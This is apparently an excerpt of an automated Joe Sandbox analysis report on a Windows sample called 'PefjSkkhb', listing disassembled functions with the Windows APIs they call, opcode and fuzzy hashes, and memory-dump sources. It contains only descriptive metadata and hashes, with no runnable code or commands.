                                                                                                                                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3677997916-0
                                                                                                                                                                                                                    • Opcode ID: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                                                                                                                    • Instruction ID: c7b45b5b9d3aafc255662eae5231ee86e89ba8f20c34f0200502bd5a79316669
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f9d145549c06eb65d00f5eb7279f160a7e02f1bbdde725fe5b236e37f00bb809
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F214C72A1878187D7508F15F454A6E73B4FB58B84B881235EB8D93B24DF3AE454CB44
                                                                                                                                                                                                                    Function 00007FF656CD9118 Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1703294689-0
                                                                                                                                                                                                                    • Opcode ID: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                                                                                                                    • Instruction ID: 9717cb3ac33326d02da776b7d0249236f18a332bb63e90237a525f25ab8edf39
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 898675fe9218c456e9635897f2d1d868c629d4b8853c74df44181d0bc5e5716e
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B2E04874F0434182EF446B609C4937523765F44B81F095538C80F97392CE3FE448C200
                                                                                                                                                                                                                    Function 00007FF656CC66C0 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 466COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                    • String ID: CALL
                                                                                                                                                                                                                    • API String ID: 1385522511-4196123274
                                                                                                                                                                                                                    • Opcode ID: 3ab9c53ac7f24a14fe446b825ba0e7d0e9d066f42862b00dcef2c92ad467b9c8
                                                                                                                                                                                                                    • Instruction ID: 697609742fc7cd7dc956e8e34f4eeab3e1aa33d94bbc0ad0292c908115057614
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3ab9c53ac7f24a14fe446b825ba0e7d0e9d066f42862b00dcef2c92ad467b9c8
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 29228EB2B086418AFB20DF66D5502BC37B1FB44B88F584636DA5EA7795CF3AE495C300
                                                                                                                                                                                                                    Function 00007FF656CB6838 Relevance: 3.1, APIs: 2, Instructions: 100fileCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateFile
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 823142352-0
                                                                                                                                                                                                                    • Opcode ID: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                                                                                                                    • Instruction ID: 14f31c262c19623e3e04a4737d0b6fb4b34798b092a09d8249aa5a9ab2450676
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27afbee001dd2f14ab302487d27ec6636649baba111da03fe0a26036beb73b09
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E641A5B2A1864282E7648F11E40433A77B0EB46B64F485731DAADAB6E5CF3FD444CB40
                                                                                                                                                                                                                    Function 00007FF656CB6460 Relevance: 3.1, APIs: 2, Instructions: 91libraryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                                                                                    • Opcode ID: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                                                                                                                    • Instruction ID: 9c04f5b6e08c0361b77ecd51e532e2a22a87dc4de4362f518268976b5d014f8c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4148032de61d84ae77990a54cc2b1f6886a047abe3d4ed031ab241bf62c2a7ff
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C416163B14A5286EB10DF26D8513BC33B0EB44B8CF494231EA4DA769ADF7ED958C740
                                                                                                                                                                                                                    Function 00007FF656CB6258 Relevance: 3.1, APIs: 2, Instructions: 72windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: IconNotifyShell_
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1144537725-0
                                                                                                                                                                                                                    • Opcode ID: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                                                                                                                                    • Instruction ID: 5cfc8e687a510a1be04f22cc7094547a29ae344f42439c16557a979f6acf1448
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 32275c29c25acc732941c8e4684a790687827c850461c861846bda9725fb2c55
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33418F72A0DB4586E7518F11E4443A937B4FB48B88F480635EE8DA7799CF7EE584C710
                                                                                                                                                                                                                    Function 00007FF656CB3730 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsThemeActive.UXTHEME ref: 00007FF656CB3756
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CD9334: _invalid_parameter_noinfo.LIBCMT ref: 00007FF656CD9348
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB36E8: SystemParametersInfoW.USER32 ref: 00007FF656CB3705
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB36E8: SystemParametersInfoW.USER32 ref: 00007FF656CB3725
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: GetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB37F2
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: IsDebuggerPresent.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3807
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: GetFullPathNameW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB388D
                                                                                                                                                                                                                      • Part of subcall function 00007FF656CB37B0: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,00007FF656CB3785), ref: 00007FF656CB3924
                                                                                                                                                                                                                    • SystemParametersInfoW.USER32 ref: 00007FF656CB3797
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme_invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4207566314-0
                                                                                                                                                                                                                    • Opcode ID: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                                                                                                                    • Instruction ID: 1c728f32539eefefe28764372068ace935744e46df5c4764181ccc35779299b7
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 125559b38fbd26b10a906e66ef6d00d9a995a301863d6166c855ae18de5db764
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BE0114B0E0C2428AF710AB61E95557533B1AF08708F8C4B35D44DFA2A2DEBFB484C700
                                                                                                                                                                                                                    Function 00007FF656CEB3C0 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 485612231-0
                                                                                                                                                                                                                    • Opcode ID: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                                                                                                                    • Instruction ID: c8c1d6bfd333c316d16476e3020e3b39506d738bb16d3417b19d0622387b1b1d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a3ca9d619edea9c8d6b14ea3b5be24cbdeed60e72e2f20e181f770ec40af026
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 91E0E691E1954383FF156BF2D81717536B15F48794B4C4534C90DE7351DD2ED895C740
                                                                                                                                                                                                                    Function 00007FF656CF04B8 Relevance: 2.6, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CloseErrorHandleLast
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 918212764-0
                                                                                                                                                                                                                    • Opcode ID: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                                                                                                                    • Instruction ID: 1009534c07bc2a9b6c07a4fd4ee5ff2cb74cd641d5599e92419d7936b774f76d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 002ee005d6ec78c53f39e4c0500c246461289f80a8623e937adbc3f867fac835
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A1108D0F0C28341FEA59764A5A537C66F15F98BA4F0C0234DA2EE63C2CDAEEC40C201
                                                                                                                                                                                                                    Function 00007FF656CC1475 Relevance: 2.0, APIs: 1, Instructions: 533COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1385522511-0
                                                                                                                                                                                                                    • Opcode ID: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                                                                                                                                                                    • Instruction ID: 488c785ca5a8e0ae045c8cd4064501e9205693c676cf0d00cd63d4409044c190
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f93ec442a7ba0cc11a5443e7b35fed9f8b1ff32b547cd1dd2020b4df4ad6a075
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9C3291B2A0C68285FB60CB16D4446B967B1FB85B84F4C4632DA5EA7B95DF3FE481C700
                                                                                                                                                                                                                    Function 00007FF656D120D6 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                                                                                    • Opcode ID: 0ff12a4b86dd364bd8841967dfe1c1faa899831173c5e12b18ab2423a49b3e7f
                                                                                                                                                                                                                    • Instruction ID: d54d2b3472fed2e4556f9b748496a6c405c4b586239269211dc488de07f57d2c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ff12a4b86dd364bd8841967dfe1c1faa899831173c5e12b18ab2423a49b3e7f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05413D62B08A8186FB21EF65D1903AD33B1EB44B88F484635CE1EA7795CF7EE495C340
                                                                                                                                                                                                                    Function 00007FF656CD8FAC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3947729631-0
                                                                                                                                                                                                                    • Opcode ID: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                                                                                                                    • Instruction ID: dfc3880ed5006e764ac0d0da493aaadd7cf0a68752bc736d2a866a1367ff2990
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867c7b1033e3f760706abf2d2d8e8ea2ff197c00114f18769501bed1359dd07f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7E418EA5A486D282EB64AB15E4502786271AF48B84F0C4636DA0FFB691DE3FF881C740
                                                                                                                                                                                                                    Function 00007FF656CE48E0 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                                                                                                                    • Instruction ID: 8eb618691edcc02a9a14e2dba719f7c07b4847c61a5dd43bfe07553756d64890
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3afeb395a215f3ec17922b2632f819625b98a9037f1372fc9655ff2c7b0df073
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C12168A1A0C6C381EA629F51940217E63B5BF45B84F588171EA4CE7B96DF7EEC41C780
                                                                                                                                                                                                                    Function 00007FF656CF6D04 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                    • Opcode ID: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                                                                                                                    • Instruction ID: 95549690b4117d8f08dde8c2b2a38ecad4d731bad3dd33b4fca29121311a014b
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ecb6d4795bd6ab7db71324e13dbdbe24fc2c4762c378ad1b5bb23dbd8960ecc0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4321D6B261864387EB658F25E441379B6B0EB84B94F2C4234DA5DD76D5DF2ED840CB00
                                                                                                                                                                                                                    Function 00007FF656D35B80 Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000013.00000002.2360142073.00007FF656CB1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF656CB0000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2359926804.00007FF656CB0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D65000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360318494.00007FF656D88000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360380444.00007FF656D9A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    • Associated: 00000013.00000002.2360426817.00007FF656DA4000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_19_2_7ff656cb0000_PefjSkkhb.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID:
